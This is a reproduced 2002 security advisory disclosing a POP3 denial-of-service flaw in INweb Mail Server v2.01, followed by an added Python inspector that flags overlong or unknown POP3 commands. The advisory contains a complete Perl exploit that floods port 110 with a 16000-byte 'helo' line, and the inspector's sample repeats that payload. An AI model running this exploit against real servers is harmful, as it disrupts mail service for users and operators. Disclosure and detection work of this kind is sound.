
INwebMailServer.txt

13 Nov 2002 00:00:00 | Reported by Tamer Sahin | Type: packetstorm | Source: packetstormsecurity.com

Memory corruption in INweb Mail Server v2.01 allows denial of service via malicious requests.

Code
`-----BEGIN PGP SIGNED MESSAGE-----  
Hash: MD5  
  
- --[ INweb Mail Server v2.01 Denial of Service Vulnerability ]--  
  
- --[ Type  
  
Denial of Service  
  
- --[ Release Date  
  
November 12, 2002  
  
- --[ Product / Vendor  
  
The INweb Mail Server is a standard Internet POP3 and SMTP mail server that  
runs flawlessly under Windows 2000 and NT and other Windows platforms.  
The INweb Mail Server provides numerous unique features for both small and  
large businesses as well as ISPs. This includes many facilities to handle spam  
and viruses.  
  
http://www.inwebmail.com  
  
- --[ Summary  
  
A memory corruption vulnerability exists in INweb Mail Server v2.01. The POP3  
server included with INweb Mail Server does not properly handle some types  
of requests. By submitting a maliciously crafted request to the POP3 server,  
an attacker could crash the system, resulting in a denial of service.  
  
- --[ Exploit  
  
An exploit for this vulnerability exists and is available below.  
  
==================== SNIP ====================  
  
#!/usr/bin/perl -w  
  
use IO::Socket;  
  
$host = $ARGV[0];  
$port = "110";  
$evil = "A" x 16000;  
  
print "INweb Mail Server v2.01 Denial of Service Vulnerability by SecurityOffice\n";  
print "Usage: $0 host\n";  
print "Connecting...\n";  
$socket = IO::Socket::INET->  
new(Proto=>"tcp",  
PeerAddr=>$host,  
PeerPort=>$port)  
|| die "Connection failed.\n";  
  
print "Attacking...\n";  
print $socket "helo:$evil\n\n";  
  
close($socket);  
print "\nConnection closed. Finished.\n\n";  
  
==================== SNIP ====================  
  
- --[ Tested  
  
INweb Mail Server v2.01 / Windows 2000 sp3  
  
- --[ Vulnerable  
  
INweb Mail Server v2.01 / Windows 2000 sp3  
  
- --[ Disclaimer  
  
http://www.securityoffice.net is not responsible for the misuse or illegal use  
of any of the information and/or the software listed on this security advisory.  
  
- --[ Author  
  
Tamer Sahin  
[email protected]  
http://www.securityoffice.net  
  
All our advisories can be viewed at http://www.securityoffice.net/articles/  
  
Please send suggestions, updates, and comments to [email protected]  
  
(c) 2002 SecurityOffice  
  
This Security Advisory may be reproduced and distributed, provided that this  
Security Advisory is not modified in any way and is attributed to SecurityOffice  
and provided that such reproduction and distribution is performed for  
non-commercial purposes.  
  
Tamer Sahin  
http://www.securityoffice.net  
  
`
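
A defensive check for the request shape this advisory describes, added here as an example and not part of the original advisory or the vendor's code: a stream inspector that a POP3 proxy or sensor could run on client traffic, flagging any command line longer than the 255-octet limit set by RFC 2449 or starting with a verb that is not a POP3 command. The function names and the sample stream are constructed for illustration.

```python
# Added example (not from the advisory): flag POP3 client lines that break
# the protocol's length and verb rules before they reach the mail server.
MAX_LINE = 255  # RFC 2449: maximum command length in octets, CRLF included
VERBS = {b"USER", b"PASS", b"APOP", b"STAT", b"LIST", b"RETR", b"DELE",
         b"NOOP", b"RSET", b"TOP", b"UIDL", b"QUIT",   # RFC 1939
         b"CAPA", b"AUTH", b"STLS"}                     # RFC 2449/5034/2595


def classify(line, length, max_line=MAX_LINE):
    """Return (verdict, true_length, preview) for one client line."""
    preview = line[:32].decode("ascii", "replace").rstrip("\r\n")
    if length > max_line:
        return ("oversized", length, preview)
    verb = line.strip().split(b" ", 1)[0].upper()
    if not verb:
        return ("empty", length, preview)
    if verb not in VERBS:
        return ("unknown-verb", length, preview)
    return ("ok", length, preview)


def inspect_stream(chunks, max_line=MAX_LINE):
    """Yield a verdict for each LF-terminated line in a client TCP stream.

    chunks: iterable of bytes as read from the socket (arbitrary boundaries).
    At most max_line octets are buffered, so an endless line cannot exhaust
    the inspector's own memory; the true length is still counted.
    """
    buf = bytearray()
    length = 0
    for chunk in chunks:
        for byte in chunk:
            length += 1
            if len(buf) < max_line:
                buf.append(byte)
            if byte == 0x0A:  # LF ends the line
                yield classify(bytes(buf), length, max_line)
                buf.clear()
                length = 0
    if length:  # connection closed in the middle of a line
        yield classify(bytes(buf), length, max_line)


# Constructed sample: a normal login split across reads, then a request with
# the shape the advisory describes (a non-POP3 verb followed by 16000 octets).
SAMPLE = [b"USER alice\r\nPA", b"SS secret\r\n", b"helo:" + b"A" * 16000 + b"\n\n"]

if __name__ == "__main__":
    for verdict, length, preview in inspect_stream(SAMPLE):
        print(f"{verdict:13} {length:6} {preview!r}")
```

A proxy using this would close the connection on the first `oversized` verdict rather than forward the line to the backend.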

Vulners AI Score: 7.4 (High risk)